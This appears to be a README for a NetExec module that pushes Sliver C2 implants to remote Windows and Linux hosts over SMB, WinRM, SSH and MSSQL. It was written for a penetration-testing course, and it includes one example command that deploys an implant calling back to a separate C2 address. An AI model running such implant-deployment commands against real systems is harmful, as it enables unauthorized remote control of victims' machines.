A NetExec module that deploys Sliver C2 implants to remote Windows and Linux targets via SMB, WinRM, SSH, and MSSQL protocols.
- Multi-Protocol Support: SMB, WinRM, SSH, MSSQL
- Automatic OS/Architecture Detection: Detects from connection metadata
- Unique Implants: Generates unique implant per target
- Configurable Options: Beacon intervals, cleanup, wait times, staging methods
- Profile Support: Use pre-configured Sliver profiles for consistent deployments
- Cross-Platform: Deploy to Windows and Linux targets
- NetExec (nxc) installed
- Sliver C2 server running (v1.6+)
- Valid Sliver client configuration
- Target credentials (Windows: admin, Linux: root/sudo, MSSQL: sysadmin)
./scripts/install.shFor detailed installation instructions, see Installation Guide.
Deploy a Sliver implant via SMB:
nxc smb 172.16.15.20 -u localuser -p password \
-M sliver_exec \
-o RHOST=10.10.15.193
See Usage Guide for more examples and options.
- Installation Guide - Setup instructions for all platforms
- Usage Guide - Comprehensive examples and configuration options
- Architecture - Technical details and deployment modes
- Testing Guide - Unit, E2E, and integration tests
This module was written as part of the Active Directory Penetration Expert Course on Hack The Box.
Developed with assistance from AI coding assistants: Claude (Anthropic) and Grok (xAI).